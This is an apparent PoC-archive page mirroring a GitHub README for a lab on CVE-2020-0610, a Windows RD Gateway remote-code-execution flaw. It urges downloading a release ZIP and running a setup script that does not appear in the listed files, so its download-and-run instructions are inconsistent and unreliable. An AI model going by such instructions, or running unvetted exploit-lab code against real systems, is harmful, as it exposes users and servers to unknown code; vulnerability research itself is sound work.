Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2020-0610 PoC — 微软 Microsoft Windows 输入验证错误漏洞

Source
Associated Vulnerability
Title:微软 Microsoft Windows 输入验证错误漏洞 (CVE-2020-0610)
Description:A remote code execution vulnerability exists in Windows Remote Desktop Gateway (RD Gateway) when an unauthenticated attacker connects to the target system using RDP and sends specially crafted requests, aka 'Windows Remote Desktop Gateway (RD Gateway) Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-0609.
Description
🔍 Create a safe lab environment for testing CVE-2020-0610, a critical RCE vulnerability in Windows RD Gateway, with minimal disruption using DTLS techniques.
Readme
# 🎉 lab-cve-2020-0610 - Learn About a Security Vulnerability

## 🚀 Getting Started
Welcome to the lab-cve-2020-0610 project. This lab helps users understand the CVE-2020-0610 vulnerability known as BlueGate. It focuses on a weakness in Windows RD Gateway that can lead to remote code execution. 

## 📥 Download Now
[![Download](https://img.shields.io/badge/Download-releases-blue)](https://github.com/Riocipta75/lab-cve-2020-0610/releases)

## 📂 Overview
This repository contains PowerShell scripts and setup guides that demonstrate how to explore this vulnerability. You will also find examples validating the vulnerability using Nuclei templates. 

### 🌟 Features
- Clear setup guide.
- PowerShell scripts for testing.
- Examples for validating vulnerabilities.
- Designed for educational purposes.

## 🖥️ System Requirements
- Operating System: Windows 10 or later.
- Processor: Modern x64 processor.
- RAM: Minimum 4 GB.
- Disk Space: At least 100 MB for installation.

## 🔧 Installation Instructions
1. **Visit the Download Page** 

   Go to the releases page to download the necessary files: [Download Page](https://github.com/Riocipta75/lab-cve-2020-0610/releases).

2. **Download the Files**

   Choose the latest release and download the ZIP file. Ensure you save it in a location you can easily access.

3. **Extract the ZIP File**

   Right-click the downloaded ZIP file and select "Extract All." Follow the prompts to extract the contents. 

4. **Open PowerShell**

   Press the Windows key, type "PowerShell," and hit Enter. You need to run the scripts using PowerShell.

5. **Run the Setup Script**

   Navigate to the folder where you extracted the files. Type `cd path\to\your\extracted\folder`, replacing `path\to\your\extracted\folder` with the actual path. Then, run `.\setup-script.ps1` to set everything up.

6. **Explore the Lab**

   You can now run the various PowerShell scripts provided. Follow the setup guide for detailed instructions on how to use each script. 

### 💻 Running the Tests
After the setup is complete, you can initiate the tests. Each script will contain comments explaining its purpose. 

## 📄 Usage Guidelines
- Use this lab for educational and research purposes only.
- Make sure you have permission to test on any servers you run the scripts against.
- Be aware of legal and ethical considerations when exploring vulnerabilities.

## 🔗 Additional Resources
- [PowerShell Documentation](https://docs.microsoft.com/en-us/powershell/)
- [Nuclei Documentation](https://nuclei.projectdiscovery.io/)

## 💬 Questions & Feedback
If you have any questions or feedback, feel free to open an issue on this GitHub repository. Your input helps improve this project!

## 📥 Download Again
Ready to start? Visit the releases page once more: [Download Page](https://github.com/Riocipta75/lab-cve-2020-0610/releases).

Thank you for exploring the lab-cve-2020-0610 project. Enjoy your experience!
File Snapshot

[4.0K] /data/pocs/b36f6fecf7eb802d2c372c255cdcfbd722302e9f ├── [2.9K] README.md ├── [4.0K] samples │   ├── [ 171] nuclei-debug-patched.txt │   └── [ 149] nuclei-debug-vulnerable.txt └── [4.0K] scripts ├── [ 426] add-udp-3391-firewall.ps1 └── [ 457] sanity-check.ps1 2 directories, 5 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →